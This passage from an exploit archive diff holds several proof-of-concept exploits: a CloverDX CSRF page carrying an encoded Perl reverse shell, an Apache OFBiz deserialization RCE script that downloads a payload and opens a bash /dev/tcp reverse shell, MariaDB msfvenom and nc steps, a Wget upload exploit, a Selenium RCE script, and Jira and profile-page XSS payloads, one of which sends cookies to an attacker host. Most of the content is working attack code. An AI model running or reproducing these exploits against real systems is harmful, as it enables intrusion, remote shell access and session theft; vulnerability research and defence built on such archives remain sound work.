target = "http://localhost:8080"
query_comp = parse_qs(urlparse(self.path).query)
if "target" in query_comp:
target = query_comp["target"][0]
req = requests.get(target+"/clover/gui/login.jsf")
if req.status_code != 200:
sys.exit(-1)
# parse the reponse retrieve the ViewState
soup = BeautifulSoup(req.text, "html.parser")
cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"]
# Use the ViewstateCracker.java to get new Viewstate.
new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state])
new_view_state = new_view_state.decode("utf-8").strip()
print(new_view_state)
if new_view_state == "6927638971750518694:6717304323717288036":
html = ("<!DOCTYPE html><html><head></head><body><h1>Hello Clover Admin!</h1><br>"
+ "<script>window.setTimeout(function () { location.reload()}, 1500)</script></body></html>")
else:
html = ("<!DOCTYPE html><html><head>"
+ "<script>"
+ "function exec1(){document.getElementById('form1').submit(); setTimeout(exec2, 2000);}"
+ "function exec2(){document.getElementById('form2').submit(); setTimeout(exec3, 2000);}"
+ "function exec3(){document.getElementById('form3').submit(); setTimeout(exec4, 2000);}"
+ "function exec4(){document.getElementById('form4').submit();}"
+ "</script>"
+ "</head><body onload='exec1();'><h1>Hello Clover Admin! Please wait here, content is loading...</h1>"
+ "<script>history.pushState('','/');</script>"
+ "<form target='if1' id='form1' method='GET' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if2' id='form2' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='headerForm&#58;manualListenerItem' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='allContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='headerForm&#58;manualListenerItem' name='headerForm&#58;manualListenerItem'>"
+ "<input type='hidden' value='headerForm' name='headerForm'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if3' id='form3' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm&#58;taskType' name='javax.faces.source'>"
+ "<input type='hidden' value='manualListeneForm&#58;taskType' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='manualListeneForm&#58;taskFormFragment' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='valueChange' name='javax.faces.behavior.event'>"
+ "<input type='hidden' value='change' name='javax.faces.partial.event'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm&#58;taskType_input'>"
+ "<input type='hidden' value='on' name='manualListeneForm&#58;saveRunRecord_input'>"
+ "<input type='hidden' value='true' name='manualListeneForm&#58;manualVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if4' id='form4' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='rightContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='manualListeneForm&#58;execute_button'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;properties&#58;propertiesTable&#58;propName'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;properties&#58;propertiesTable&#58;propValue'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;taskType_focus'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm&#58;taskType_input'>"
#
# Below is the HTML encoded perl reverse, replace with your own payload, remember to HTML encode.
#
+ "<input type='hidden' value='&#x70;&#x65;&#x72;&#x6c;&#x20;&#x2d;&#x65;&#x20;&#x27;&#x75;&#x73;&#x65;&#x20;&#x53;&#x6f;&#x63;&#x6b;&#x65;&#x74;&#x3b;&#x24;&#x69;&#x3d;"&#x31;&#x39;&#x32;&#x2e;&#x31;&#x36;&#x38;&#x2e;&#x36;&#x35;&#x2e;&#x32;"&#x3b;&#x24;&#x70;&#x3d;&#x34;&#x34;&#x34;&#x34;&#x3b;&#x73;&#x6f;&#x63;&#x6b;&#x65;&#x74;&#x28;&#x53;&#x2c;&#x50;&#x46;&#x5f;&#x49;&#x4e;&#x45;&#x54;&#x2c;&#x53;&#x4f;&#x43;&#x4b;&#x5f;&#x53;&#x54;&#x52;&#x45;&#x41;&#x4d;&#x2c;&#x67;&#x65;&#x74;&#x70;&#x72;&#x6f;&#x74;&#x6f;&#x62;&#x79;&#x6e;&#x61;&#x6d;&#x65;&#x28;"&#x74;&#x63;&#x70;"&#x29;&#x29;&#x3b;&#x69;&#x66;&#x28;&#x63;&#x6f;&#x6e;&#x6e;&#x65;&#x63;&#x74;&#x28;&#x53;&#x2c;&#x73;&#x6f;&#x63;&#x6b;&#x61;&#x64;&#x64;&#x72;&#x5f;&#x69;&#x6e;&#x28;&#x24;&#x70;&#x2c;&#x69;&#x6e;&#x65;&#x74;&#x5f;&#x61;&#x74;&#x6f;&#x6e;&#x28;&#x24;&#x69;&#x29;&#x29;&#x29;&#x29;&#x7b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x49;&#x4e;&#x2c;">&&#x53;"&#x29;&#x3b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x4f;&#x55;&#x54;&#x2c;">&&#x53;"&#x29;&#x3b;&#x6f;&#x70;&#x65;&#x6e;&#x28;&#x53;&#x54;&#x44;&#x45;&#x52;&#x52;&#x2c;">&&#x53;"&#x29;&#x3b;&#x65;&#x78;&#x65;&#x63;&#x28;"&#x2f;&#x62;&#x69;&#x6e;&#x2f;&#x73;&#x68;&#x20;&#x2d;&#x69;"&#x29;&#x3b;&#x7d;&#x3b;&#x27;' name='manualListeneForm&#58;shellEditor'>"
+ "<input type='hidden' value='' name='manualListeneForm&#58;workingDirectory'>"
+ "<input type='hidden' value='10000' name='manualListeneForm&#58;timeout'>"
+ "<input type='hidden' value='true' name='manualListeneForm&#58;scriptVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":","&#58;"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<iframe name='if1' style='display: hidden;' width='0' height='0' frameborder='0' ></iframe>"
+ "<iframe name='if2' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if3' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if4' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "</body></html>")
self.wfile.write(bytes(html,"utf-8"))
base64_enc_viewstatecracker = "CnB1YmxpYyBjbGFzcyBWaWV3c3RhdGVDcmFja2VyIHsKICAvKiBTVEFSVCBQQVJUIDEgKi8KICBwdWJsaWMgc3RhdGljIGZpbmFsIGludCBvZmZzZXQgICAgID0gMzI7CiAgcHVibGljIHN0YXRpYyBmaW5hbCBpbnQgaXRlcmF0aW9ucyA9IDY1NTM2OwoKICBwdWJsaWMgc3RhdGljIGZpbmFsIFN0cmluZyBnZW5lcmF0ZU5ld1ZpZXdzdGF0ZShmaW5hbCBsb25nIGlkSW5Mb2dpY2FsTWFwLCBmaW5hbCBsb25nIGlkSW5BY3R1YWxNYXApIHsKICAgIGZpbmFsIGxvbmcgZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwICA9IGlkSW5Mb2dpY2FsTWFwID4+PiBvZmZzZXQ7CiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXAgPSAoKGlkSW5Mb2dpY2FsTWFwIDw8IG9mZnNldCkgPj4+IG9mZnNldCk7CiAgICBmaW5hbCBsb25nIGZpcnN0MzJCaXRzT2ZJZEluQWN0dWFsTWFwICAgPSBpZEluQWN0dWFsTWFwID4+PiBvZmZzZXQ7ICAgICAgICAgLy8gVmVyaWZpY2F0aW9uCiAgICBmaW5hbCBsb25nIHNlY29uZDMyQml0c09mSWRJbkFjdHVhbE1hcCAgPSAoKGlkSW5BY3R1YWxNYXAgPDwgb2Zmc2V0KSA+Pj4gb2Zmc2V0KTsgLy8gVmVyaWZpY2F0aW9uCiAgICAvKiBFTkQgUEFSVCAxICovCgogICAgLyogU1RBUlQgUEFSVCAyICovCiAgICBsb25nIHRoZV9zZWVkID0gMUw7CgogICAgZm9yIChpbnQgaSA9IDA7IGkgPCBpdGVyYXRpb25zOyBpKyspIHsKICAgICAgbG9uZyB0bXBfc2VlZCA9ICgoZmlyc3QzMkJpdHNPZklkSW5Mb2dpY2FsTWFwIDw8IDE2KSArIGkpOwogICAgICBpZiAoKChpbnQpKCgodG1wX3NlZWQgKiAweDVERUVDRTY2REwgKyAweEJsKSAmICgoMUwgPDwgNDgpIC0gMSkpID4+PiAxNikpID09IHNlY29uZDMyQml0c09mSWRJbkxvZ2ljYWxNYXApIHsKICAgICAgICAvL1N5c3RlbS5vdXQucHJpbnRsbigiU2VlZCBmb3VuZDogIiArIHRtcF9zZWVkKTsKICAgICAgICB0aGVfc2VlZCA9IHRtcF9zZWVkOwogICAgICAgIGJyZWFrOwogICAgICB9CiAgICB9CiAgICAvKiBFTkQgUEFSVCAyICovCgogICAgLyogU1RBUlQgUEFSVCAzICovCiAgICAvLyBHZW5lcmF0ZSBudW1iZXIgMiAoU2Vjb25kIE51bWJlciBvZiBpZEluTG9naWNhbE1hcCkKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwoKICAgIC8vQ2FsY3VsYXRlIHRoZSB2YWx1ZSBvZiBpZEluQWN0dWFsTWFwCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgLyogRU5EIFBBUlQgMyovCgogICAgLyogU1RBUlQgUEFSVCA0Ki8KICAgIC8qIENhbGN1bGF0ZSBhIG5ldyBpZEluTG9naWNhbE1hcCAqLwoKICAgIC8vIEdlbmVyYXRlIHRoZSBmaXJzdCBoYWxmIG9mIHRoZSBmaXJzdCBMb25nCiAgICB0aGVfc2VlZCA9ICh0aGVfc2VlZCAqIDB4NURFRUNFNjZETCArIDB4QkwpICYgKCgxTCA8PCA0OCkgLSAxKTsKICAgIGludCBudW1iZXJfNSA9ICgoaW50KSh0aGVfc2VlZCA+Pj4gMTYpKTsKCiAgICAvLyBHZW5lcmF0ZSB0aGUgc2Vjb25kIGhhbGYgb2YgdGhlIGZpcnN0IExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl82ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vSGVyZSBpcyB0aGUgbmV3IGlkSW5Mb2dpY2FsTWFwCiAgICBsb25nIG5ld19sb25nXzEgPSAoKChsb25nKW51bWJlcl81IDw8IDMyKSArIG51bWJlcl82KTsKCgogICAgLyogQ2FsY3VsYXRlIGEgbmV3IGlkSW5BY3R1YWxNYXAgKi8KCiAgICAvLyBHZW5lcmF0ZSB0aGUgZmlyc3QgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl83ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vIEdlbmVyYXRlIHRoZSBzZWNvbmQgaGFsZiBvZiB0aGUgc2Vjb25kIExvbmcKICAgIHRoZV9zZWVkID0gKHRoZV9zZWVkICogMHg1REVFQ0U2NkRMICsgMHhCTCkgJiAoKDFMIDw8IDQ4KSAtIDEpOwogICAgaW50IG51bWJlcl84ID0gKChpbnQpKHRoZV9zZWVkID4+PiAxNikpOwoKICAgIC8vCiAgICBsb25nIG5ld19sb25nXzIgPSAoKChsb25nKW51bWJlcl83IDw8IDMyKSArIG51bWJlcl84KTsKCiAgICByZXR1cm4gbmV3X2xvbmdfMSArICI6IiArIG5ld19sb25nXzI7CiAgICAvKkVORCBQQVJUNCovCiAgfQogcHVibGljIHN0YXRpYyB2b2lkIG1haW4gKFN0cmluZyBhcmdzW10pIHsKCVN0cmluZyB0b2tlbiA9IGFyZ3NbMF07CglTdHJpbmdbXSBsb25ncyA9IHRva2VuLnNwbGl0KCI6Iik7Cglsb25nIGxvbmcxID0gTG9uZy5wYXJzZUxvbmcobG9uZ3NbMF0pOwoJbG9uZyBsb25nMiA9IExvbmcucGFyc2VMb25nKGxvbmdzWzFdKTsKCVN0cmluZyBuZXdUb2tlbiA9IGdlbmVyYXRlTmV3Vmlld3N0YXRlKGxvbmcxLGxvbmcyKTsKCVN5c3RlbS5vdXQucHJpbnRsbihuZXdUb2tlbik7Cgp9Cgp9Cg=="
#
# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
with open("ViewstateCracker.java","w") as f:
f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8'))
exploit_handler = ExploitHandler
PORT = 6010
exploit_server = socketserver.TCPServer(("", PORT), exploit_handler)
exploit_server.serve_forever()

78
exploits/java/webapps/50178.sh Executable file
View file

@ -0,0 +1,78 @@
# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
# Date: 2021-08-04
# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd)
# Vendor Homepage: https://ofbiz.apache.org/index.html
# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip
# Version: 17.12.01
# Tested on: Linux
# CVE : CVE-2020-9496
# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE.
#!/usr/bin/env bash
# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization.
# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.
#
# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc.
# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
#
# Steps to exploit:
#
# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80)
# Step 2: Start nc listener (Recommended 8001).
# Step 3: Run the exploit.
url='https://127.0.0.1' # CHANGE THIS
port=8443 # CHANGE THIS
function helpPanel(){
echo -e "\nUsage:"
echo -e "\t[-i] Attacker's IP"
echo -e "\t[-p] Attacker's Port"
echo -e "\t[-h] Show help pannel"
exit 1
}
function ctrl_c(){
echo -e "\n\n[!] Exiting...\n"
exit 1
}
# Ctrl + C
trap ctrl_c INT
function webRequest(){
echo -e "\n[*] Creating a shell file with bash\n"
echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh
echo -e "[*] Downloading YsoSerial JAR File\n"
wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar
echo -e "[*] Generating a JAR payload\n"
payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n")
echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5
curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null
echo -e "[*] Generating a second JAR payload"
payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n")
echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5
curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload2</serializable></value></member></struct></value></param></params></methodCall>" -k -H 'Content-Type:application/xml' &>/dev/null
echo -e "\n[*]Deleting Files..."
rm ysoserial-master-d367e379d9-1.jar && rm shell.sh
}
declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do
case $arg in
i) ip=$OPTARG; let parameter_enable+=1;;
p) ncport=$OPTARG; let parameter_enable+=1;;
h) helpPanel;;
esac
done
if [ $parameter_enable -ne 2 ]; then
helpPanel
else
webRequest
fi

20
exploits/linux/local/49765.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
# Date: 03/18/2021
# Exploit Author: Central InfoSec
# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
# Tested on: Linux
# CVE : CVE-2021-27928
# Proof of Concept:
# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so
# Start a listener
nc -lvp <port>
# Copy the payload to the target machine (In this example, SCP/SSH is used)
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so
# Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'

116
exploits/linux/local/50236.py Executable file
View file

File diff suppressed because one or more lines are too long

57
exploits/linux/local/50465.c Normal file
View file

@ -0,0 +1,57 @@
# Exploit Title: Mini-XML 3.2 - Heap Overflow
# Google Dork: mxml Mini-xml Mini-XML
# Date: 2020.10.19
# Exploit Author: LIWEI
# Vendor Homepage: https://www.msweet.org/mxml/
# Software Link: https://github.com/michaelrsweet/mxml
# Version: v3.2
# Tested on: ubuntu 18.04.2
# 1.- compile the Mini-XML code to a library use compile line"clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer-no-link".
# 2.- compile my testcase and link them to a binary use compile line "clang -g -O0 -fno-omit-frame-pointer -gline-tables-only -fsanitize=address -fsanitize-address-use-after-scope -fsanitize=fuzzer". In my testcase, I use the API "mxmlLoadString" to parse a string.
# 3.- run the binary for a short time.crash. because the "mxml_string_getc" didn't versify the string's length and cause buffer-overflow.
# 4.- Here are the crash backtrace.
=================================================================
==6265==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x612000000a73 at pc 0x000000558e2d bp 0x7ffe13e2caa0 sp 0x7ffe13e2ca98
READ of size 1 at 0x612000000a73 thread T0
#0 in mxml_string_getc /opt/mnt/software/mxml32/mxml-file.c:2422:13
#1 in mxml_load_data /opt/mnt/software/mxml32/mxml-file.c:1558:20
#2 in mxmlLoadString /opt/mnt/software/mxml32/mxml-file.c:180:11
#3 in LLVMFuzzerTestOneInput /opt/mnt/software/mxml32/mxml_fuzzer.cpp:12:8
#4 in fuzzer::Fuzzer::ExecuteCallback(unsigned char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x42f357)
#5 in fuzzer::RunOneTest(fuzzer::Fuzzer*, char const*, unsigned long) (/opt/mnt/software/mxml32/a.out+0x41f7ea)
#6 in fuzzer::FuzzerDriver(int*, char***, int (*)(unsigned char const*, unsigned long)) (/opt/mnt/software/mxml32/a.out+0x42a7b0)
#7 in main (/opt/mnt/software/mxml32/a.out+0x41d4b2)
#8 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310
#9 in _start (/opt/mnt/software/mxml32/a.out+0x41d529)
# 6.- Here are my testcase.
#include <string>
#include <vector>
#include <assert.h>
#include "mxml.h"
extern "C" int LLVMFuzzerTestOneInput(const uint8_t *data, size_t size) {
std::string c(reinterpret_cast<const char *>(data), size);
char *ptr;
mxml_node_t *tree;
tree = mxmlLoadString(NULL, c.c_str(), MXML_NO_CALLBACK);
if(tree){
ptr = mxmlSaveAllocString(tree, MXML_NO_CALLBACK);
if(!ptr) assert(false);
mxmlDelete(tree);
}
return 0;
}

54
exploits/linux/remote/49815.py Executable file
View file

@ -0,0 +1,54 @@
# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)
# Original Exploit Author: Dawid Golunski
# Exploit Author: liewehacksie
# Version: GNU Wget < 1.18
# CVE: CVE-2016-4971
import http.server
import socketserver
import socket
import sys
class wgetExploit(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
# This takes care of sending .wgetrc/.bash_profile/$file
print("We have a volunteer requesting " + self.path + " by GET :)\n")
if "Wget" not in self.headers.get('User-Agent'):
print("But it's not a Wget :( \n")
self.send_response(200)
self.end_headers()
self.wfile.write("Nothing to see here...")
return
self.send_response(301)
print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n")
new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)
print("Sending redirect to %s \n"%(new_path))
self.send_header('Location', new_path)
self.end_headers()
HTTP_LISTEN_IP = '192.168.72.2'
HTTP_LISTEN_PORT = 80
FTP_HOST = '192.168.72.4'
FTP_PORT = 2121
FILE = '.bash_profile'
handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
print("Ready? Is your FTP server running?")
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT))
else:
print("FTP is down :( Exiting.")
exit(1)
print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT)
handler.serve_forever()

79
exploits/linux/webapps/49915.rb Executable file
View file

@ -0,0 +1,79 @@
# Exploit Title: Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver)
# Date: 2021-05-27
# Exploit Author: Jon Stratton
# Vendor Homepage: https://www.selenium.dev/
# Software Link: https://selenium-release.storage.googleapis.com/3.141/selenium-server-standalone-3.141.59.jar
# Version: 3.141.59
# Tested on: Selenium Server 3.141.59, webdriver, geckodriver
#
# https://github.com/JonStratton/selenium-node-takeover-kit/blob/master/examples/selenium_node_rce.rb
#
# When Selenium runs, it creates a custom profile (in /tmp/ for Linux) on the Node. This profile then gets overwritten by a possible overlay that is sent in a base64 encoded zip file when a Selenium session is started.
#
# One of the config file can be used to set a custom handler (which do things like, for instance, associates “mailto:blah@blah.com” to your email client). In this example, a new handler is created for “application/sh” that will execute the argument with “/bin/sh”
#
# Side notes, this profile doesn't safely unzip. So this can be used to write files to the file-system.
#
# The Payload is encoded and embedded as inline data associated with the "application/sh" mime type.
#!/usr/bin/env ruby
require 'optparse'
require 'net/http'
require 'json'
require 'uri'
require 'zip'
require 'base64'
options = {}
OptionParser.new do |opts|
opts.banner = 'Usage: example.rb [options]'
opts.on('-hURL', '--hubURL', 'Selenium Hub URL') do |h|
options[:hub] = h
end
opts.on('--help', 'Prints this help') do
puts opts
exit
end
end.parse!
hub_url = options[:hub]
payload = 'rm -rf $0
echo success > /tmp/selenium_node_rce.txt'
# Build profile zip file.
stringio = Zip::OutputStream::write_buffer do |io|
# Create a handler for shell scripts
io.put_next_entry("handlers.json")
io.write('{"defaultHandlersVersion":{"en-US":4},"mimeTypes":{"application/sh":{"action":2,"handlers":[{"name":"sh","path":"/bin/sh"}]}}}')
end
stringio.rewind
encoded_profile = Base64.strict_encode64(stringio.sysread)
# Create session with our new profile
newSession = {:desiredCapabilities => {:browserName => "firefox", :firefox_profile => encoded_profile}}
uri = URI.parse(hub_url)
http = Net::HTTP.new(uri.host, uri.port)
# Start session with encoded_profile and save session id for cleanup.
uri = URI.parse("%s/session" % [hub_url])
request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
request.body = JSON.generate(newSession)
response = http.request(request)
sessionId = JSON.parse(response.body)["value"]["sessionId"]
# URL.
data_url = "data:application/sh;charset=utf-16le;base64,%s" % [Base64.encode64(payload)]
uri = URI.parse("%s/session/%s/url" % [hub_url, sessionId])
request = Net::HTTP::Post.new(uri.request_uri, 'Content-Type' => 'application/json')
request.body = JSON.generate(:url => data_url)
response = http.request(request)
# End session(not working)
uri = URI.parse("%s/session/%s" % [hub_url, sessionId])
request = Net::HTTP::Delete.new(uri.request_uri)
http.request(request)
exit

27
exploits/macos/webapps/50068.txt Normal file
View file

@ -0,0 +1,27 @@
# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)
# Date: 06/05/2021
# Exploit Author: CAPTAIN_HOOK
# Vendor Homepage: https://www.atlassian.com/
# Software Link: https://www.atlassian.com/software/jira/download/data-center
# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
# Tested on: ANY
# CVE : CVE-2021-26078
Description:
The number range searcher component in Jira Server and Jira Data Center before version 8.5.14, from version 8.6.0 before version 8.13.6, and from version 8.14.0 before version 8.16.1 allows remote attackers inject arbitrary HTML or JavaScript via across site scripting (XSS) vulnerability
*Fixed versions:*
- 8.5.14
- 8.13.6
- 8.16.1
- 8.17.0
POC:
- *Story points* custom field that exists by default in all JIRA Server has 3 types of Search template ( None , number range searcher, number searcher) By default the value of Search template is number range searcher OR number searcher. if the value of Search template was set on number range searcher the JIRA server is vulnerable to XSS attack by lowest privilege . For Testing Check the Story points custom field and it's details ( for verifying that the Search template sets on number range searcher) with your ADMIN account ( just like the images) and in the other window Type this With your least privilege
user : jql=issuetype%20%3D%20Epic%20AND%20%22Story%20Points%22%20%3C%3D%20%22%5C%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E%22%20AND%20%22Story%20Points%22%20%3E%3D%20%221%22
Your XSS Will be triggered immediately.
Reference:
https://jira.atlassian.com/browse/JRASERVER-72392?error=login_required&error_description=Login+required&state=9b05ec1f-587c-4014-9053-b6fdbb1efa21

37
exploits/multiple/webapps/49367.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Multiple Stored Cross-Site Scripting
# Date: 30-12-2020
# Exploit Author: Mesut Cetin
# Vendor Homepage: http://egavilanmedia.com
# Version: 1.0
# Tested on Windows 10, Firefox 83.0, Burp Suite Professional v1.7.34
Vulnerable parameter: email, gender, username
Payload: <script>alert(document.cookie)</script>
Proof of Concept:
To bypass client-side filter, we will use Burp Suite. Reproduce the vulnerability by following the steps:
1. Login with default credentials "admin:password" at the demo page at: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/profile.php
2. Click above right on the "Profile" tab
3. Navigate to the "Edit Profile" tab
4. In Firefox, use Foxyproxy and click on "Intercept" within Burp Suite. Press on "Update password" button at demo page.
5. Capture the POST request in Burp Suite and manipulate the parameter as shown:
POST /User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile_action.php HTTP/1.1
Host: demo.egavilanmedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 180
Origin: http://demo.egavilanmedia.com
Connection: close
Referer: http://demo.egavilanmedia.com/User%20Registration%20and%20Login%20System%20With%20Admin%20Panel/admin/profile.php
Cookie: PHPSESSID=944b2es2eb67f971af305b2105e35c3e
fullname=admin&username=<script>alert(document.cookie)</script>&email=<script>alert('PoC 2')</script>&gender==<script>alert('PoC 3')</script>&action=update_admin
6. Forward the request and refresh the page. You'll receive three different XSS pop-ups. One of them contains the PHPSESSID cookie. By using payloads like <BODY ONLOAD=fetch(`http://attackers-page.com/${document.cookie}`)>, the session cookies can be send to the attacker.

29
exploits/multiple/webapps/49826.js Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Markdown Explorer 0.1.1 - XSS to RCE
# Exploit Author: TaurusOmar
# Date: 04/05/2021
# CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
# Risk: High (8.8)
# Vendor Homepage: https://github.com/jersou/markdown-explorer
# Version: 0.1.1
# Tested on: Windows, Linux, MacOs
# Software Description:
Easily explore, view and edit markdown documentation of a file tree.
